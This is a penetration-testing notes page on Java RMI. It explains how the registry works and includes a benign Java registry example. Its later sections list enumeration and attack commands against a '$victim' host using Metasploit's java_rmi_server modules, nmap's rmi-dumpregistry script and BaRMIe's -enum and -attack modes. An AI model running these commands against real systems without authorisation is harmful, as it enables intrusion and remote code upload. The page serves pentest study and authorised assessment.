akde/infosec

Information security is ultimately about managing risk


Java Remote Method Invocation is a method to execute code remotely on other systems. This Oracle document describes it. But to use it, a program has to be uploaded first, or it has to be known how to communicate with it.

General

  • A Java registry daemon has to be running.
    • Run rmiregistry (bundled with Java) from the same directory as the other code.
    • If there is an “unmarshalled” error, stop rmiregistry and add the following to the server code to start a registry server in the proper environment:
      LocateRegistry.createRegistry(1099);
  • Programs can register endpoints / classes there.
  • Clients can query the registry for endpoints and use them.

See here for an introduction.
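
The registry flow described above, as an added example that is not part of the original notes: the server starts the registry in-process with LocateRegistry.createRegistry(1099) so it shares the server's classpath, binds one endpoint, and a client lists and calls it. The Greeter interface, the "greeter" binding name and the loopback address are assumptions made for the demo.

```java
import java.rmi.Remote;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.rmi.server.UnicastRemoteObject;
import java.util.Arrays;

public class RegistryDemo {
    // Hypothetical remote interface, invented for this example.
    public interface Greeter extends Remote {
        String greet(String name) throws RemoteException;
    }

    static class GreeterImpl implements Greeter {
        public String greet(String name) { return "Hello, " + name; }
    }

    public static void main(String[] args) throws Exception {
        // Only load classes from the local classpath, never from a
        // codebase URL supplied by a peer (default since Java 7u21).
        System.setProperty("java.rmi.server.useCodebaseOnly", "true");
        // Address embedded in exported stubs; this does not restrict
        // which interface the registry listens on.
        System.setProperty("java.rmi.server.hostname", "127.0.0.1");

        // Server: the registry runs inside this JVM, so it can
        // unmarshal the Greeter stub without a separate classpath.
        Registry registry = LocateRegistry.createRegistry(1099);
        GreeterImpl impl = new GreeterImpl();
        Greeter stub = (Greeter) UnicastRemoteObject.exportObject(impl, 0);
        registry.rebind("greeter", stub);

        // Client: query the registry for endpoints, then use one.
        Registry remote = LocateRegistry.getRegistry("127.0.0.1", 1099);
        System.out.println("Bound names: " + Arrays.toString(remote.list()));
        Greeter greeter = (Greeter) remote.lookup("greeter");
        System.out.println(greeter.greet("world"));

        // Unexport everything so the JVM can exit.
        registry.unbind("greeter");
        UnicastRemoteObject.unexportObject(impl, true);
        UnicastRemoteObject.unexportObject(registry, true);
    }
}
```

The list() call returns the same binding names that a registry dump shows, so it doubles as a quick audit of what a registry you operate exposes.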

Enumeration

With Metasploit, use scanner/misc/java_rmi_server to check if the class loader is activated. If yes, new code can be uploaded, e.g. with multi/misc/java_rmi_server.

With nmap:

nmap -sSVC --script rmi-dumpregistry -p 1100 $victim

With BaRMIe:

java -jar BaRMIe_v1.01.jar -enum $victim 1100

Exploiting

With BaRMIe:

java -jar BaRMIe_v1.01.jar -attack $victim 1100
